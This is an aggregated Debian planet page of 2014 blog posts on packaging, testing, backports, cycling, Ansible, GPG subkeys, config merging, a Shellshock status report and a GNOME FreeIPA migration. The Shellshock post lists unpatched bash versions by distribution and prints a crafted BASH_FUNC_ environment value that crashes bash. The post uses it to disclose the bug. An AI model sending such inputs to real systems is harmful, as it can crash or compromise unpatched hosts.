A bit of research on Stackoverflow and related sites did not tell me how to modify playbin2 usage such that it does not require X11 when it is only playing AUDIO data.

What the HECK is going on here. Are the graphical people trying to silently overtake the world? Is Linux becoming the new Windows? The distinction between CLI and GUI has become more and more blurry in the recent years. I fear for my beloved platform.

If you know how to patch soundCLI to not require X11, please let me know. My current work-around is to replace all gstreamer usage with a simple "system" call to vlc. That works, but it does not give me comment display (since soundCLI doesn't know the playback position anymore) and hangs after every track, requiring me to enter "quit" manually on the VLC prompt. I really would have liked to use mplayer2 for this, but alas, mplayer2 does not support https. Oh well, why would it need to, in this day and age where everyone seems to switch to https by default. Oh well.
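If you're copying this workaround, invoking VLC's dumb interface with an auto-exit flag should at least avoid the interactive prompt after each track. A sketch, with the URL as a placeholder:

cvlc --play-and-exit "$track_url"

It still won't give soundCLI the playback position, of course.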

10 October, 2014 09:00AM by Mario Lang

hackergotchi for Martin Pitt

Martin Pitt

Running autopkgtests in the cloud

It’s great to see more and more packages in Debian and Ubuntu getting an autopkgtest. We now have some 660, and soon we’ll get another ~ 4000 from Perl and Ruby packages. Both Debian’s and Ubuntu’s autopkgtest runner machines are currently static manually maintained machines which ache under their load. They just don’t scale, and at least Ubuntu’s runners need quite a lot of handholding.

This needs to stop. To quote Tim “The Tool Man” Taylor: We need more power! This is a perfect scenario to be put into a cloud with ephemeral VMs to run tests in. They scale, there is no privacy problem, and maintenance of the hosts then becomes Somebody Else’s Problem.

I recently brushed up autopkgtest’s ssh runner and the Nova setup script. Previous versions didn’t support “revert” yet, tests that leaked processes caused eternal hangs due to the way ssh works, and image building wasn’t yet supported well. autopkgtest 3.5.5 now gets along with all that and has a dozen other fixes. So let me introduce the Binford 6100 variable horsepower DEP-8 engine python-coated cloud test runner!

While you can run adt-run from your home machine, it’s probably better to do it from an “autopkgtest controller” cloud instance as well. Testing frequently requires copying files and built package trees between testbeds and controller, which can be quite slow from home and causes timeouts. The requirements on the “controller” node are quite low — you either need the autopkgtest 3.5.5 package installed (possibly a backport to Debian Wheezy or Ubuntu 12.04 LTS), or run it from git ($checkout_dir/run-from-checkout), and other than that you only need python-novaclient and the usual $OS_* OpenStack environment variables. This controller can also stay running all the time and easily drive dozens of tests in parallel as all the real testing action is happening in the ephemeral testbed VMs.

The most important preparation step to do for testing in the cloud is quite similar to testing in local VMs with adt-virt-qemu: You need to have suitable VM images. They should be generated every day so that the tests don’t have to spend 15 minutes on dist-upgrading and rebooting, and they should be minimized. They should also be as similar as possible to local VM images that you get with vmdebootstrap or adt-buildvm-ubuntu-cloud, so that test failures can easily be reproduced by developers on their local machines.

To address this, I refactored the entire knowledge of how to turn a pristine “default” vmdebootstrap or cloud image into an autopkgtest environment into a single /usr/share/autopkgtest/adt-setup-vm script. adt-buildvm-ubuntu-cloud now uses this, you should use it with vmdebootstrap --customize (see adt-virt-qemu(1) for details), and it’s also easy to run for building custom cloud images: Essentially, you pick a suitable “pristine” image, nova boot an instance from it, run adt-setup-vm through ssh, then turn this into a new adt-specific "daily" image with nova image-create. I wrote a little script create-nova-adt-image.sh to demonstrate and automate this; the only parameter that it gets is the name of the pristine image to base on. This was tested on Canonical's Bootstack cloud, so it might need some adjustments on other clouds.

Thus something like this should be run daily (pick the base images from nova image-list):

  $ ./create-nova-adt-image.sh ubuntu-utopic-14.10-beta2-amd64-server-20140923-disk1.img
  $ ./create-nova-adt-image.sh ubuntu-utopic-14.10-beta2-i386-server-20140923-disk1.img

This will generate adt-utopic-i386 and adt-utopic-amd64.

Now I picked 34 packages that have the "most demanding" tests, in terms of package size (libreoffice), kernel requirements (udisks2, network manager), reboot requirement (systemd), lots of brittle tests (glib2.0, mysql-5.5), or needing Xvfb (shotwell):

  $ cat pkglist
  apport
  apt
  aptdaemon
  apache2
  autopilot-gtk
  autopkgtest
  binutils
  chromium-browser
  cups
  dbus
  gem2deb
  glib-networking
  glib2.0
  gvfs
  kcalc
  keystone
  libnih
  libreoffice
  lintian
  lxc
  mysql-5.5
  network-manager
  nut
  ofono-phonesim
  php5
  postgresql-9.4
  python3.4
  sbuild
  shotwell
  systemd-shim
  ubiquity
  ubuntu-drivers-common
  udisks2
  upstart

Now I created a shell wrapper around adt-run to work with the parallel tool and to keep the invocation in a single place:

$ cat adt-run-nova
#!/bin/sh -e
adt-run "$1" -U -o "/tmp/adt-$1" --- ssh -s nova -- \
    --flavor m1.small --image adt-utopic-i386 \
    --net-id 415a0839-eb05-4e7a-907c-413c657f4bf5

Please see /usr/share/autopkgtest/ssh-setup/nova for details of the arguments. --image is the image name we built above, --flavor should use a suitable memory/disk size from nova flavor-list and --net-id is an "always need this constant to select a non-default network" option that is specific to Canonical Bootstack.

Finally, let's run the packages from above using ten VMs in parallel:

  parallel -j 10 ./adt-run-nova -- $(< pkglist)

After a few iterations of bug fixing there are now only two failures left, which are due to flaky tests; the infrastructure now seems to hold up fairly well.

Meanwhile, Vincent Ladeuil is working full steam to integrate this new stuff into the next-gen Ubuntu CI engine, so that we can soon deploy and run all this fully automatically in production.

Happy testing!

10 October, 2014 07:25AM by pitti

October 09, 2014

Ingo Juergensmann

Buildd.Net: update-buildd.net v0.99 released

Buildd.Net offers a buildd-centric view of autobuilder networks, such as previously Debian's autobuilder network or nowadays the autobuilder network of debian-ports.org. The policy of debian-ports.org requires a GPG key, valid for 1 year, for the buildd to sign packages for upload. Buildd admins are usually lazy people. At least they are running a buildd instead of building those packages all manually. Being a lazy buildd admin, it might happen that you forget to renew your GPG key, which will render your buildd unable to upload newly built packages.

When participating in Buildd.Net you need to run update-buildd.net, a small script that transmits some statistical data about your package building. I have now added a GPG key expiry check to that script, which will warn the buildd admin by mail and with a note on the Buildd.Net arch status page, such as the one for m68k. So, either your client updates automatically to the new version or you can download the script yourself.
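The check itself is nothing magic; a rough sketch of the idea (not the literal script: the key ID and mail address are placeholders, and field 7 of gpg's --with-colons output holds the expiry timestamp):

expiry=$(gpg --with-colons --list-keys "$KEYID" | awk -F: '/^pub/ {print $7; exit}')
if [ -n "$expiry" ] && [ "$expiry" -lt $(( $(date +%s) + 30*24*3600 )) ]; then
    echo "GPG key $KEYID expires within 30 days" | mail -s "buildd key expiry" buildd@example.org
fi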

09 October, 2014 07:29PM by ij

hackergotchi for Lisandro Damián Nicanor Pérez Meyer

Lisandro Damián Nicanor Pérez Meyer

Qt 5.3.2 in Wheezy-backports: just a few hours away

In a few days (initially: “in more or less 24 hs”, see the notes below) most of Qt 5.3.2 will be available as a Wheezy backport. That means that if you are using Debian stable you don't need to wait for Jessie: just add the wheezy-backports repo to your sources.list and get it :)
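If you haven't used backports before, it boils down to something like this (mirror and package name are only examples):

# /etc/apt/sources.list
deb http://http.debian.net/debian wheezy-backports main

apt-get update
apt-get -t wheezy-backports install qtbase5-dev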

The rest of Qt 5 will arrive soon.

This is the same version that will be shipped in Jessie, so whatever you develop with it will work with the next Debian stable release :)

Don't forget: you better start porting your Qt4 apps to Qt5!

Note 2014-10-10: uups, it will still take a few days, but it will be there soon :)

Note 2014-10-15: currently building!

09 October, 2014 06:50PM by Lisandro Damián Nicanor Pérez Meyer (noreply@blogger.com)

hackergotchi for Chris Lamb

Chris Lamb

London—Paris—London 2014

I've wanted to ride to Paris for a few months now but was put off by the hassle of taking a bicycle on the Eurostar, as well as having a somewhat philosophical and aesthetic objection to taking a bike on a train in the first place. After all, if one is already in possession of a mode of transport...

My itinerary was straightforward:

Friday 12h00: London → Newhaven
Friday 23h00: Newhaven → Dieppe (ferry)
Saturday 04h00: Dieppe → Paris
Saturday 23h00: (Sleep)
Sunday 07h00: Paris → Dieppe
Sunday 18h00: Dieppe → Newhaven (ferry)
Sunday 21h00: Newhaven → Peacehaven
Sunday 23h00: (Sleep)
Monday 07h00: Peacehaven → London

Packing list

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/01.jpg
  • Ferry ticket (unnecessary in the end)
  • Passport
  • Credit card
  • USB A male → mini A male (charges phone, battery pack & front light)
  • USB A male → mini B male (for charging or connecting to Edge 800)
  • USB mini A male → OTG A female (for Edge 800 uploads via phone)
  • Waterproof pocket
  • Sleeping mask for ferry (probably unnecessary)
  • Battery pack

Not pictured:

  • Castelli Gabba Windstopper short-sleeve jersey
  • Castelli Velocissimo bib shorts
  • Castelli Nanoflex arm warmers
  • Castelli Squadra rain jacket
  • Garmin Edge 800
  • Phone
  • Front light: Lezyne Macro Drive
  • Rear lights: Knog Gekko (on bike), Knog Frog (on helmet)
  • Inner tubes (X2), Lezyne multitool, tire levers, hand pump

Day 1: London → Newhaven

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/02.jpg

Tower Bridge.

Many attempt to go from Tower Bridge → Eiffel Tower (or Marble Arch → Arc de Triomphe) in less than 24 hours. This would have been quite easy if I had left a couple of hours later.
https://chris-lamb.co.uk/wp-content/2014/london-paris-london/03.jpg

Fanny's Farm Shop, Merstham, Surrey.

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/04.jpg

Plumpton, East Sussex.

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/05.jpg

West Pier, Newhaven.

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/07.jpg

Leaving Newhaven on the 23h00 ferry.


Day 2: Dieppe → Paris

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/09.jpg

Beauvoir-en-Lyons, Haute-Normandie.

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/10.jpg

Sérifontaine, Picardie.

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/12.jpg

La tour Eiffel, Paris.

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/13.jpg

Champ de Mars, Paris.

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/15.jpg

Pont de Grenelle, Paris.


Day 3: Paris → Dieppe

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/18.jpg

Cormeilles-en-Vexin, Île-de-France.

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/20.jpg

Gisors, Haute-Normandie.

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/21.jpg

Paris-Brest, Gisors, Haute-Normandie.

Wikipedia: This pastry was created in 1910 to commemorate the Paris–Brest bicycle race begun in 1891. Its circular shape is representative of a wheel. It became popular with riders on the Paris–Brest cycle race, partly because of its energizing high caloric value, and is now found in pâtisseries all over France.
https://chris-lamb.co.uk/wp-content/2014/london-paris-london/22.jpg

Gournay-en-Bray, Haute-Normandie.

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/23.jpg

Début de l'Avenue Verte, Forges-les-Eaux, Haute-Normandie.

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/24.jpg

Mesnières-en-Bray, Haute-Normandie.

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/26.jpg

Dieppe, Haute-Normandie.

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/28.jpg

«La Mancha».


Day 4: Peacehaven → London

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/29.jpg

Peacehaven, East Sussex.

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/31.jpg

Highbrook, West Sussex.

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/33.jpg

London weather.


Summary

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/34.jpg
Distance: 588.17 km
Pedal turns: ~105,795

My only non-obvious tips would be to buy a disposable blanket in the Newhaven Co-Op to help you sleep on the ferry. In addition, as the food on the ferry is good enough you only need to get to the terminal one hour before departure, avoiding time on your feet in unpicturesque Newhaven.

In terms of equipment, I would bring another light for the 4AM start on «L'Avenue Verte» if only as a backup and I would have checked I could arrive at my Parisian Airbnb earlier in the day - I had to hang around for five hours in the heat before I could have a shower, properly relax, etc.

I had been warned not to rely on being able to obtain enough water en route on Sunday but whilst most shops were indeed shut I saw a bustling tabac or boulangerie at least once every 20km so one would never be truly stuck.

Route-wise, the suburbs of London and Paris are both equally dismal and unmotivating, and there is about 50km of rather uninspiring and exposed riding on the D915.

However, «L'Avenue Verte» is fantastic even in the pitch-black and the entire trip was worth it simply for the silent and beautiful Normandy sunrise. I will be back.

09 October, 2014 05:19PM

hackergotchi for Jan Wagner

Jan Wagner

Updated Monitoring Plugins Version is coming soon

Three months ago version 2.0 of Monitoring Plugins was released. Since then many changes were integrated. You can find a quick overview in the upstream NEWS.

Now it's time to move forward and a new release is expected soon. It would be very welcome if you could give the latest source snapshot a try. You also can give the Debian packages a go and grab them from my 'unstable' and 'wheezy-backports' repositories at http://ftp.cyconet.org/. Right after the stable release, the new packages will be uploaded into Debian unstable. The whole packaging changes can be observed in the changelog.

Feedback is very appreciated via Issue tracker or the Monitoring Plugins Development Mailinglist.

Update: The official call for testing is available.

09 October, 2014 09:46AM

October 08, 2014

hackergotchi for Jonathan Dowland

Jonathan Dowland

Ansible

I've just recently built the large bulk of VMs that we use for first semester teaching. This year that was 112. We use the same general approach for these as our others: get a generic base image up and running, with just enough configuration complete so a puppet client starts up; get it talking to our master; let puppet take it from there.

There are pragmatic balances between how much we do in the kickstart versus how much we do in puppet, but also between when we build a new VM from scratch versus when we clone an existing image, and how much specialisation we do in the clone image.

Unfortunately this year we ended up in a situation where our clone image wouldn't talk to our puppet master out of the box, due to some changes we'd made to our master set up since the clone image was prepared. We didn't really have enough time to re-clone the entire set of VMs from a fixed base image, and instead needed to fix them whilst up. However we couldn't rely on puppet to do that, since they wouldn't talk to the puppet master.

We needed to manually reset the puppet client state per VM and then re-establish a trust relationship with the correct master (which is not the default master hostname in our environment anymore). Luckily, we deploy a local account with a known passphrase via the kickstart, which also has sudo access, as an interim measure before puppet strips it back out again and sets up proper LDAP and Kerberos authentication. So we can at least get into the boxes. However logging into 112 VMs by hand is not a particularly pleasant task.

In the past I might have tried to achieve this using something like clusterssh but this year I decided to give ansible a try instead.

Ansible started life, I believe, as a tool that would let you run arbitrary commands on remote hosts, including navigating ssh and sudo as required, without needing any agent software on the remote end. It has since seemed to grow into an enterprise product in its own right, seemingly in competition with puppet, chef, cfengine et al.

Looking at the Ansible website now I'd be rather put off by just how "enterprisey" it has become - much as I am by the puppet website, if I'm honest - but if you persevere past the webinars, testimonials, etc. etc., you can find your way to the documentation, and running an arbitrary command is as simple as

  • defining a list of hosts
  • running an ansible command line referencing some or all of those hosts

The hosts file format is simple

[somehosts]
host1
host2
...
[otherhosts]
host3

The command line can be a little bit more complex, especially if you need to use one username for ssh, another for sudo, and you don't want to use ssh key auth:

ansible -i ./hostsfile somehosts -k -u someuser \
    --sudo -K -a 'puppet agent --onetime --no-daemonize --verbose'

"all" would work where I've used somehosts in the example above.

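Incidentally, a quick way to sanity-check the host list and credentials first is Ansible's built-in ping module:

ansible -i ./hostsfile all -k -u someuser -m ping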
So there you go: using one configuration management system to bootstrap another. I'm sure I've reserved myself a special place in hell for this.

08 October, 2014 08:12PM

hackergotchi for Steve Kemp

Steve Kemp

Writing your own e-books is useful

Before our recent trip to Poland I took the time to create my own e-book, containing the names/addresses of people to whom we wanted to send postcards.

Authoring ebooks is simple, and this was a useful use-case. (Ordinarily I'd have my contacts on my phone, but I deliberately left it at home ..)

I did mean to copy and paste some notes from wikipedia about transport, tourist destinations, etc, into a brief guide. But I forgot.

In other news the toy virtual machine I hacked together got a decent series of updates, allowing you to embed it and add your own custom opcode(s) easily. That was neat, and fell out naturally from the switch to using function-pointers for the opcode implementation.

08 October, 2014 07:03PM

Elena 'valhalla' Grandi

New gpg subkey

The GPG subkey I keep for daily use was going to expire, and this time I decided to create a new one instead of changing the expiration date.

Doing so I've found out that gnupg does not support importing just a private subkey for a key it already has (on IRC I've heard that there may be more information on it on the gpg-users mailing list), so I've written a few notes on what I had to do on my website, so that I can remember them next year.

The short version is:

* Create your subkey (in the full keyring, the one with the private master key)
* export every subkey (including the expired ones, if you want to keep them available), but not the master key
* (copy the exported key from the offline computer to the online one)
* delete your private key from your regular use keyring
* import back the private keys you have exported before.
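Roughly, the commands involved look like this (a sketch, with 0xDEADBEEF as a placeholder key ID; the first two commands run on the offline computer):

gpg --edit-key 0xDEADBEEF                      # addkey, then save
gpg --export-secret-subkeys 0xDEADBEEF > subkeys.gpg
gpg --delete-secret-keys 0xDEADBEEF            # on the online keyring
gpg --import subkeys.gpg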

08 October, 2014 06:42PM by Elena ``of Valhalla''

Ian Donnelly

A Comparison of Elektra Merge and Git Merge

Hi everybody,

We have gotten some inquiries about how Elektra's merge functionality compares to the merge functionality built into git: git merge-file. I am glad to say that Elektra outperforms git's merge functionality in the same ways it outperforms diff3 when applied to configuration files. Obviously, git's merge functionality does a much better job with source code, but that is not the goal of Elektra. As I showed in that previous example, diff3 is line-based, whereas Elektra is not (unless you mount a file using the line plugin). The example I used before, and will go over again, is using smb.conf and in-line comments.

Many of our storage plug-ins understand the difference between comments and actual configuration data. So if a configuration file has an inline comment like so:
max log size = 10000 ; Controls the size of the log file (in KiB)
we can compare the actual key/value pairs between versions (max log size = 10000) and deal with the comments separately.

As a result, if we have a base:
max log size = 1000 ; Size in KiB

Ours:
max log size = 10000 ; Size in KiB

Theirs:
max log size = 1000 ; Controls the size of the log file (in KiB)

The result using elektra-merge would be:
max log size = 10000 ; Controls the size of the log file (in KiB)

Just like diff3, git merge-file can only compare these lines as lines, and thus there is a conflict. When running git merge-file smb.conf.ours smb.conf.base smb.conf.theirs we get the following output showing a conflict:
<<<<<<< smb.conf.ours
max log size = 10000 ; Size in KiB
=======
max log size = 1000 ; Controls the size of the log file (in KiB)
>>>>>>> smb.conf.theirs

This really shows the strength of Elektra's plugin system and why merging is an obvious use-case for Elektra. I hope this example makes it clear why using Elektra's merge functionality is advantageous over git's merge functionality. Once again I would like to stress the importance of quality storage plug-ins for Elektra: the more quality plugins we have, the more powerful Elektra can be. If you are interested in plugins and would like to help us add functionality to Elektra by creating a new plug-in, be sure to read my basic tutorial on how to do so.

Sincerely,
Ian Donnelly

08 October, 2014 06:02PM by Ian Donnelly

hackergotchi for EvolvisForge blog

EvolvisForge blog

PSA: #shellshock still unfixed except in Debian unstable

I just installed, for work, Hanno Böck’s bashcheck utility on our monitoring system, and watched all¹ systems go blue.

① All but two. One is not executing remote scripts from the monitoring for security reasons, the other is my desktop which runs Debian “sid” (unstable).

This means that all those distributions still have unfixed #shellshock bugs.
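Reproducing this is easy, since bashcheck is a plain shell script; something like the following does the job (repository location quoted from memory, so double-check it):

git clone https://github.com/hannob/bashcheck.git
cd bashcheck && bash ./bashcheck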

  • lenny (with Md’s packages): bash (3.2-4.2) = 3.2.53(1)-release
    • CVE-2014-6277 (lcamtuf bug #1)
  • squeeze (LTS): bash (4.1-3+deb6u2) = 4.1.5(1)-release
    • CVE-2014-6277 (lcamtuf bug #1)
  • wheezy (stable-security): bash (4.2+dfsg-0.1+deb7u3) = 4.2.37(1)-release
    • CVE-2014-6277 (lcamtuf bug #1)
    • CVE-2014-6278 (lcamtuf bug #2)
  • jessie (testing): bash (4.3-10) = 4.3.27(1)-release
    • CVE-2014-6277 (lcamtuf bug #1)
    • CVE-2014-6278 (lcamtuf bug #2)
  • sid (unstable): bash (4.3-11) = 4.3.30(1)-release
    • none
  • CentOS 5.5: bash-3.2-24.el5 = 3.2.25(1)-release
    • extra-vulnerable (function import active)
    • CVE-2014-6271 (original shellshock)
    • CVE-2014-7169 (taviso bug)
    • CVE-2014-7186 (redir_stack bug)
    • CVE-2014-6277 (lcamtuf bug #1)
  • CentOS 5.6: bash-3.2-24.el5 = 3.2.25(1)-release
    • extra-vulnerable (function import active)
    • CVE-2014-6271 (original shellshock)
    • CVE-2014-7169 (taviso bug)
    • CVE-2014-7186 (redir_stack bug)
    • CVE-2014-6277 (lcamtuf bug #1)
  • CentOS 5.8: bash-3.2-33.el5_10.4 = 3.2.25(1)-release
    • CVE-2014-6277 (lcamtuf bug #1)
  • CentOS 5.9: bash-3.2-33.el5_10.4 = 3.2.25(1)-release
    • CVE-2014-6277 (lcamtuf bug #1)
  • CentOS 5.10: bash-3.2-33.el5_10.4 = 3.2.25(1)-release
    • CVE-2014-6277 (lcamtuf bug #1)
  • CentOS 6.4: bash-4.1.2-15.el6_5.2.x86_64 = 4.1.2(1)-release
    • CVE-2014-6277 (lcamtuf bug #1)
  • CentOS 6.5: bash-4.1.2-15.el6_5.2.x86_64 = 4.1.2(1)-release
    • CVE-2014-6277 (lcamtuf bug #1)
  • lucid (10.04): bash (4.1-2ubuntu3.4) = 4.1.5(1)-release
    • CVE-2014-6277 (lcamtuf bug #1)
  • precise (12.04): bash (4.2-2ubuntu2.5) = 4.2.25(1)-release
    • CVE-2014-6277 (lcamtuf bug #1)
    • CVE-2014-6278 (lcamtuf bug #2)
  • quantal (12.10): bash (4.2-5ubuntu1) = 4.2.37(1)-release
    • extra-vulnerable (function import active)
    • CVE-2014-6271 (original shellshock)
    • CVE-2014-7169 (taviso bug)
    • CVE-2014-7186 (redir_stack bug)
    • CVE-2014-6277 (lcamtuf bug #1)
    • CVE-2014-6278 (lcamtuf bug #2)
  • trusty (14.04): bash (4.3-7ubuntu1.4) = 4.3.11(1)-release
    • CVE-2014-6277 (lcamtuf bug #1)
    • CVE-2014-6278 (lcamtuf bug #2)

I don’t know if/when all distributions will have patched their packages ☹ but thought you’d want to know the hysteria isn’t over yet…

… however, I hope you were not stupid enough to follow the advice of this site which suggests you to download some random file over the ’net and execute it with superuser permissions, unchecked. (I think the Ruby people were the first to spread this extremely insecure, stupid and reprehensible technique.)

Updates:

  • rsc points out that CentOS only supports 5.«latest» and 6.«latest», and paying RHEL customers get 5.«x».«y» but only occasionally. We updated one of the two systems in question and shut the other down due to lack of use.
  • trusty (14.04): bash (4.3-7ubuntu1.5) = 4.3.11(1)-release
    • none
  • Yes, comments on this blog are disabled; mail t.glaser@tarent.de for feedback.
  • Since I was asked (twice): the namespace patches by Florian Weimer protect from most exploits. The bugs are, nevertheless, present:
    root@debian-wheezy:~ # env 'BASH_FUNC_foo()=() { x() { _; }; x() { _; } <<'"$(perl -e '{print "A"x1000}'); }" bash -c :
    Segmentation fault
    139|root@debian-wheezy:~ # dmesg | tail -1
    [3121102.362274] bash[1699]: segfault at dfdfdfdf ip 00000000f766df36 sp 00000000ffe90b34 error 4 in libc-2.13.so[f75ee000+15d000]
     
  • To one eMail sender: If you do not understand why a CGI or something else could invoke a shell, or what a segmentation fault trap is, do not bother me. Especially not in that tone.
  • To another eMail sender: Yes, quantal is end of life. It’s also upgraded. First and last time I ever used *buntu’s “do-release-upgrade”. Broke kernel and GRUB, and upgraded to saucy. I manually “apt-get –purge dist-upgrade”d to trusty (went surprisingly well).
  • precise (12.04): bash (4.2-2ubuntu2.6) = 4.2.25(1)-release
    • none

Thanks to ↳ tarent for letting me do this work during $dayjob time!

08 October, 2014 01:57PM by Thorsten Glaser


hackergotchi for Michal Čihař

Michal Čihař

Wammu 0.37

It has been more than three years since the last release of Wammu and I've decided it's time to push the changes made in the Git repos to the users. So here comes Wammu 0.37.

The list of changes is not really huge, but in total that means 1470 commits in git (most of those are translations):

  • Translation updates (Indonesian, Spanish, ...).
  • Add export of contact to XML.
  • Add Get all menu option.
  • Added appdata metadata.

I will not make any promises for future releases (if there are any) as the tool is not really in active development.

Filed under: English Gammu Wammu | 0 comments | Flattr this!

08 October, 2014 10:00AM by Michal Čihař (michal@cihar.com)

October 07, 2014

hackergotchi for Thorsten Glaser

Thorsten Glaser

mksh R50d released

The last MirBSD Korn Shell update broke update-initramfs because I accidentally introduced a regression in field splitting while fixing other bugs – sorry!

mksh R50d was just released to fix that, and a small NULL pointer dereference found by Goodbox on IRC. Thanks to my employer tarent for a bit of time to work on it.

07 October, 2014 03:54PM by MirOS Developer tg (tg@mirbsd.org)

hackergotchi for Joachim Breitner

Joachim Breitner

New website layout

After 10 years I finally got around to re-decorating my website. One reason was ICFP, where just too many people told me that I no longer look like the photo on my old website (which is very true). Another reason was that I was visiting my brother, who is very good at web design (check out his portfolio) and could help me a bit.

I wanted something practical and maybe a bit staid, so I drew inspiration from typical LaTeX typography, and also from Edward Z. Yang’s blog: a serif font (Utopia) for the main body, justified and hyphenated text. Large section headers in a knobbly bold sans-serif font (Latin Modern Sans, which reasonably resembles Computer Modern). To intensify that impression, I put the main text on a white box that lies – like a sheet of paper – on the background. As a special gimmick, the per-page navigation (or, in the case of the blog, the list of categories) is marked up like a figure in a paper.

Of course this would be very dire without a suitable background. I really like the procedural art by Jared Tarbell, especially substrate and interAggregate. Both have been turned into screensavers shipped with xscreensaver, so I hacked the substrate code to generate a seamless tile and took a screenshot of the result. I could not make up my mind yet on how dense it has to be to look good, so for every page I randomly pick one of six variants for now.

I simplified the navigation a bit. The old News section had already been removed recently. The Links section is gone – I guess link lists on homepages are so 90s. The sections Contact and About me are merged and awaiting some cleanup. The link to the satirical news site Heisse News is demoted to a mention in the Contents section.

This hopefully helps make the site navigable on mobile devices (the old homepage was unusable). CSS media queries adjust the layout slightly on narrow screens, and separately for print devices.

Being the nostalgic that I am, I still keep the old design, as well as the two designs before that, around, with comments on their history.

07 October, 2014 03:40PM by Joachim Breitner (mail@joachim-breitner.de)

ghc-heap-view for GHC 7.8

Since the last release of ghc-heap-view, which was compatible with GHC-7.6, I got 8 requests for a GHC-7.8 compatible version. I started working on it in January, but got stuck and then kept putting it off.

Today, I got the ninth request, and I did not want to wait for the tenth, so I finally finished the work and you can use the new ghc-heap-view-0.5.2 with GHC-7.8.

I used this chance to migrate its source repository from Darcs to git (mirrored on GitHub), so maybe this means that when 7.10 comes out, the requests to update it will come with working patches :-). I also added a small test script so that Travis can check it.

I did not test it very thoroughly yet. In particular, I did not test whether ghc-vis works as expected.

I still think that the low-level interface that ghc-heap-view creates using custom Cmm code should move into GHC itself, so that it does not break that easily, but I still did not get around to propose a patch for that.

07 October, 2014 01:55PM by Joachim Breitner (mail@joachim-breitner.de)

hackergotchi for Andrea Veri

Andrea Veri

The GNOME Infrastructure is now powered by FreeIPA!

As preannounced here the GNOME Infrastructure switched to a new Account Management System which is reachable at https://account.gnome.org. All the details will follow.

Introduction

It’s been a while since someone actually touched the underlying authentication infrastructure that powers the GNOME machines. The very first setup was originally configured by Jonathan Blandford (jrb), who set up an OpenLDAP instance with several customized schemas (pServer fields in the old CVS days, pubAuthorizedKeys and GNOME module-related fields in recent times).

While the OpenLDAP server was living on the GNOME machine called clipboard (aka ldap.gnome.org), the clients were configured to synchronize users, groups and passwords through the nslcd daemon. After several years Jeff Schroeder joined the Sysadmin Team, and during one cold evening (the date is Tue, February 1st 2011) spent some time configuring SSSD to replace the nslcd daemon, which was missing one of SSSD's most important features: caching. What surely convinced Jeff to adopt SSSD (a very new but promising piece of software at the time, as the first release happened right before 2010’s Christmas) was its caching feature, as the commit log also states (“New sssd module for ldap information caching”).

It was enough for a user to log in once and the ‘/var/lib/sss/db’ directory was populated with their login information, so the daemon in charge of picking up login details no longer had to query the LDAP server every single time a request was made. This feature has definitely helped on many occasions, especially when the LDAP server was down for some reason and sysadmins needed to access a specific machine or service: without SSSD that was never going to work, and sysadmins would probably have been locked out of the machines they managed (except where ‘/etc/passwd’, ‘/etc/group’ and ‘/etc/shadow’ entries were still available as a fallback).

Things were working just fine except for a few downsides that appeared later on:

  1. the web interface (view) on our LDAP user database was managed by Mango, an outdated tool, which many wanted to rewrite in Django, that slowly became a huge dinosaur nobody ever wanted to look into again
  2. the Foundation membership information was managed through a MySQL database, leaving two databases and two sets of users unrelated to each other
  3. users were not able to modify their own account information; even a single e-mail change required them to mail the GNOME Accounts Team, which then had to authenticate the request and finally update the account.

Today’s infrastructure changes finally fix the issues outlined in (1), (2) and (3).

What has changed?

The GNOME Infrastructure is now powered by Red Hat’s FreeIPA, which bundles several FOSS components into one big “bundle”, all surrounded by an easy and intuitive web UI that helps users update their account information on their own, without needing the Accounts Team or any other administrative entity. Users will also find two custom fields on their “Overview” page: “Foundation Member since” and “Last Renewed on date”. As you may have understood already, we finally managed to migrate the Foundation membership database into LDAP itself, to store the information we want once and for all. As a side note, some users that were Foundation members in the past may not find any details stored in the Foundation fields outlined above. That is expected, as we were only able to migrate the current and old Foundation members that had an LDAP account registered at the time of the migration. If that is your case and you would still like the information to be stored in the new setup, please get in contact with the Membership Committee, stating so.

Where can I get my first login credentials?

Let’s make a little distinction between users that previously had access to Mango (usually maintainers) and users that didn’t. If you used to access Mango, you should be able to log in to the new Account Management System by entering your GNOME username and the password you used for Mango. (After logging in for the very first time you will be prompted to update your password; please choose a strong one, as this account will be unique across the whole GNOME Infrastructure.)

If you never had access to Mango, lost your password, or thought “why is he talking about a fruit now?” the first time you read the word Mango in this post, you can reset your password with the following command:

ssh -l yourgnomeuserid account.gnome.org

The command will start an SSH connection to account.gnome.org; once authenticated (with the SSH key you previously registered on our Infrastructure) it will trigger a command that directly sends a brand new password to the e-mail address registered for your account. From my tests it seems GMail treats the e-mail as a phishing attempt, probably because the body contains the word “password” twice. That said, if the e-mail does not appear in your inbox, please double-check your Spam folder.

Now that Mango is gone how can I request a new account?

With Mango we used to have a form that automatically e-mailed the maintainer of the selected GNOME module, who would then approve or reject the request. In the case of a positive vote from the maintainer, the Accounts Team would create the account itself.

With the recent introduction of a commit robot directly on l10n.gnome.org, the number of account requests has dropped. In addition, users are now able to perform pretty much all the needed maintenance on their accounts themselves. That said, and while we will probably build a form in the future, we feel that requesting accounts can be handled by mailing the Accounts Team directly, which will then mail the maintainer of the respective module and create the account. As just said, the number of account creations has become very low and the queue is currently clear. The documentation has been updated to reflect these changes at:

https://wiki.gnome.org/AccountsTeam
https://wiki.gnome.org/AccountsTeam/NewAccounts

I was used to have access to a specific service but I don’t anymore, what should I do?

